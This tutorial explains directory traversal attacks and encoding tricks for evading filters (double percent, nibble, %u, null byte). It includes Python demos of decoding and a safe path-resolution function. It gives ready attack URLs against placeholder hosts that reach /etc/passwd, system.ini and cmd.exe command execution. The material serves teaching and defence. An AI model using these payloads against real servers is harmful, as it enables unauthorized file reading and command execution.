Unicode Directory Traversal Attack
Preface
I researched this topic to gain a solid understanding of the Unicode Directory Traversal Attack and of the techniques an attacker can use to obfuscate it.
Introduction
A Directory Traversal Attack manipulates a URL so that it backtracks through a computer's directories and reaches restricted files. Any device or application that uses an HTTP-based interface is potentially vulnerable to it.
Most web servers restrict users to a specific portion of the filesystem, typically called the "root directory", in which they are confined.
On Linux/Unix, the default Apache document root is set by the configuration line:
DocumentRoot "/var/www/html"
On Windows, the default IIS document root is:
c:\Inetpub\wwwroot
Depending on how the web server is set up, an attacker can craft requests that step out of the root directory and reach other parts of the filesystem, which can lead to a full compromise.
What is Directory Traversal Attack?
Directory Traversal, also known as Path Traversal or the dot-dot-slash (../) attack, is an HTTP exploit that allows attackers to access restricted directories and files, view data, and execute commands outside the web server's root directory. The vulnerability can exist either in the web server software itself, such as Apache or IIS, or in web application code that handles user-supplied input improperly, which may allow arbitrary commands to be executed.
The main objective of this attack is to gain access to a file or program that is not intended to be accessible on the web server.
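The core problem can be sketched in a few lines. This is a minimal illustration, assuming a hypothetical handler (`naive_resolve` is not from any real server) that joins the requested name onto the document root without checking the result. `posixpath` is used so the behaviour is the same on any platform.

```python
import posixpath

DOCUMENT_ROOT = "/var/www/html"  # the Apache default quoted earlier


def naive_resolve(requested: str) -> str:
    """Join the request onto the root with no validation (hypothetical, unsafe)."""
    return posixpath.normpath(posixpath.join(DOCUMENT_ROOT, requested))


print(naive_resolve("index.html"))           # /var/www/html/index.html
print(naive_resolve("../../../etc/passwd"))  # /etc/passwd
```

Each "../" removes one directory level, so three of them are enough to climb from /var/www/html to the filesystem root.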
How does it work?
To perform a directory traversal attack, all an attacker needs is a web browser and a URL constructed to navigate to the desired folder on the same drive. The attack can be disguised by using encoded representations of the dot ("."), forward slash ("/") and backslash ("\"). According to RFC 2396, characters in a URI may be escaped as a percent sign (%) followed by two hexadecimal digits.
Different types of Unicode encoding:
1. Hex Encoding - The simplest method of encoding a URL, accepted by both IIS and Apache. It consists of the percent character "%" followed by the character's ASCII value as two hexadecimal digits.
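As a rough sketch of this escaping, the snippet below percent-encodes every character of a string and decodes it again. The helper `hex_encode` is an illustrative name, not a library function. It is written by hand because `urllib.parse.quote` leaves unreserved characters such as "." unencoded.

```python
from urllib.parse import unquote


def hex_encode(text: str) -> str:
    """Percent-encode every character, including ones normally left as-is."""
    return "".join(f"%{byte:02x}" for byte in text.encode("ascii"))


encoded = hex_encode("../")
print(encoded)           # %2e%2e%2f
print(unquote(encoded))  # ../
```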
%2e%2e%2f becomes ../ on the first decoding
2. Double Percent Hex Encoding - This encoding is supported by Microsoft IIS. The percent sign itself is hex encoded as %25 and is followed by the two hexadecimal digits of the byte being encoded.
%252e %252e %252f becomes "%2e %2e %2f" on the first decoding and "../" on the second decoding.
3. Double Nibble Hex Encoding - This encoding is supported by Microsoft IIS. Each hexadecimal digit (nibble) of the byte value is itself encoded using standard hex encoding.
%%32%65 %%32%65 %%32%66 becomes %2e %2e %2f on its first decoding and ../ on its second decoding.
Attack : http://server.com/scripts/%%32%65%%32%65%%32%66/Windows/System32/cmd.exe?/c+dir+c:\
4. First Nibble Hex Encoding - This encoding is supported by Microsoft IIS. Only the first nibble is encoded, as in the following example:
%%32e %%32e %%32f becomes %2e %2e %2f on its first decoding and ../ on its second decoding
Attack : http://www.victim.com/userdata.php?file=%%32e%%32e%%32f%%32e%%32e%%32f%%32e%%32e%%32fwinnt/system32/cmd.exe?/c+dir
5. Second Nibble Hex Encoding - This encoding is supported by Microsoft IIS. It works like first nibble hex encoding, except that the second hexadecimal digit is the one encoded.
%2%65 %2%65 %2%66 becomes %2e %2e %2f on its first decoding and ../ on its second decoding.
Attack : http://www.victim.com/shows.asp?view=%2%65%2%65%2%66%2%65%2%65%2%66%2%65%2%65%2%66Windows/system.ini
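The double-decoding behaviour of encodings 2 to 5 can be checked with a small sketch. It assumes a lenient decoder that replaces every well-formed %XX and leaves anything else untouched. `decode_once` is a hypothetical helper written for this illustration, not the actual IIS decoding routine.

```python
import re

_PERCENT_HEX = re.compile(r"%([0-9A-Fa-f]{2})")


def decode_once(text: str) -> str:
    """Replace each well-formed %XX with its character; leave the rest alone."""
    return _PERCENT_HEX.sub(lambda m: chr(int(m.group(1), 16)), text)


variants = {
    "double percent": "%252e%252e%252f",
    "double nibble": "%%32%65%%32%65%%32%66",
    "first nibble": "%%32e%%32e%%32f",
    "second nibble": "%2%65%2%65%2%66",
}

for name, payload in variants.items():
    first = decode_once(payload)   # %2e%2e%2f in every case
    second = decode_once(first)    # ../ in every case
    print(f"{name}: {payload} -> {first} -> {second}")
```

A filter that inspects the request after only one decoding pass sees %2e%2e%2f rather than ../, which is why these variants work as evasion techniques against servers that decode twice.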
6. Microsoft %u Encoding - Microsoft IIS supports a non-standard method of encoding web requests, known as "%u" encoding. Because the method is non-standard, many network intrusion detection systems may not detect attacks encoded this way.
Requests use the format "%uXXXX", where "XXXX" is the hexadecimal value of the character. For example, %u002e %u002e %u002f becomes ../
Attack : http://www.victim.com/userdata.php?file=%u002e%u002e%u002f%u002e%u002e%u002f%u002e%u002e%u002f%u002e%u002e%u002fetc/passwd
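The following sketch shows why a standard decoder misses this form. `decode_percent_u` is a hypothetical helper that mimics the %uXXXX convention described above. Python's `urllib.parse.unquote` stands in for a standards-only decoder and leaves the payload unchanged.

```python
import re
from urllib.parse import unquote

_U_ESCAPE = re.compile(r"%u([0-9A-Fa-f]{4})")


def decode_percent_u(text: str) -> str:
    """Replace each %uXXXX with the character whose code point is XXXX."""
    return _U_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), text)


payload = "%u002e%u002e%u002f" * 4 + "etc/passwd"

print(unquote(payload) == payload)  # True: standard decoding changes nothing
print(decode_percent_u(payload))    # ../../../../etc/passwd
```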
7. Null Byte Encoding - An evasion technique effective against applications developed in C-based programming languages. When a URL-encoded null byte (%00, or 0x00 in hex) is decoded, it is treated as the end of the string, so anything after it is ignored.
Normal : http://www.victim.com/userdata.php?file=mydata.dat
Attack : http://www.victim.com/userdata.php?file=../../../etc/passwd%00
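A minimal sketch of the null byte effect, assuming a hypothetical application that only accepts file names ending in ".dat" and then hands the name to a C-style API. The payload and the helper `c_string_view` are illustrative, not taken from a real exploit.

```python
from urllib.parse import unquote


def c_string_view(value: str) -> str:
    """Return what a C-style API would see: everything before the first NUL."""
    return value.split("\x00", 1)[0]


requested = unquote("../../../etc/passwd%00.dat")  # hypothetical payload

print(requested.endswith(".dat"))  # True: a naive extension check passes
print(c_string_view(requested))    # ../../../etc/passwd
```

The check and the file access disagree about where the string ends, and the attacker exploits that gap.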
How do I protect against it?
- Apply the most up-to-date security patches
- Set up the web root directory on a non-system partition
- Filter and validate all user input
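One possible way to filter user input is sketched below. It is a sketch under stated assumptions, not a complete defence: `safe_resolve` and `WEB_ROOT` are hypothetical names, and the policy of rejecting any input that still contains "%" after one decoding pass is a deliberately strict choice that also blocks legitimate names containing a percent sign.

```python
import posixpath
from urllib.parse import unquote

WEB_ROOT = "/var/www/html"  # assumed document root


def safe_resolve(raw: str) -> str:
    """Return an absolute path under WEB_ROOT, or raise ValueError."""
    decoded = unquote(raw)
    # Leftover "%" means double, nibble, or %u encoding; NUL means truncation tricks.
    if "%" in decoded or "\x00" in decoded:
        raise ValueError("leftover encoding or NUL byte")
    # Treat backslashes as separators and drop leading slashes before joining.
    relative = decoded.replace("\\", "/").lstrip("/")
    candidate = posixpath.normpath(posixpath.join(WEB_ROOT, relative))
    if candidate != WEB_ROOT and not candidate.startswith(WEB_ROOT + "/"):
        raise ValueError("path escapes the web root")
    return candidate


print(safe_resolve("images/logo.png"))  # /var/www/html/images/logo.png
```

The important design choice is to check the path after decoding and normalization, so the check sees the same string that the filesystem call will use.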
References
http://en.wikipedia.org/wiki/Directory_traversal
http://www.imperva.com/resources/glossary/directory_traversal.html
http://www.acunetix.com/websitesecurity/directory-traversal.htm
http://www.securityfocus.com/bid/1806/exploit
http://www.owasp.org/index.php/Path_Traversal
http://www.webappsec.org/projects/threat/classes/path_traversal.shtml
http://www.mysecurecyberspace.com/encyclopedia/index/directory-traversal-attack.html
http://www.ietf.org/rfc/rfc2396.txt
http://www.cert.org/advisories/CA-2001-12.html